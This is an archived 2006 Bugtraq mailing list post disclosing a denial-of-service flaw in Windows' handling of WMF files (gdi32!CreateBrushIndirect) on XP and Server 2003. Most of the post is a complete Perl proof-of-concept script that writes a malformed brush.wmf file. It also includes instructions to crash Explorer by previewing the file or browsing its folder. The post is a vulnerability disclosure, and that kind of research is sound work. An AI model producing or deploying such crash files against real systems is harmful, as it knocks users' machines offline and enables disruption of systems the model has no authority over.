| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 6 Aug 2006 14:02:18 +0400 From: cyanid-E <biz4rre@...il.com> To: bugtraq@...urityfocus.com Subject: 0-day XP SP2 wmf exploit Description: yet another 'windows meta file' (WMF) denial of service exploit. System affected: + Windows XP SP2, + Windows 2003 SP1, + Windows XP SP1, + Windows XP + Windows 2003 Tech info: page fault in gdi32!CreateBrushIndirect() because invalid pointer access. Incorrect (short) to (void*) sign extension also present. Exploit: === begin of brush.pl === #!/usr/bin/perl print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>"; print "\n\ngenerating brush.wmf..."; open(WMF, ">./brush.wmf") or die "cannot create wmf file\n"; print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64"; print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00"; print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00"; print WMF "\x00\x00\x00\x00"; close(WMF); print "ok\n\nnow try to browse folder in XP explorer and wait :)\n"; === end of brush.pl === Just run brush.pl and try to preview brush.wmf (or even browse folder with brush.wmf in windows explorer). Discovered: 06/24/2006; vendor informed but not answered
Powered by blists - more mailing lists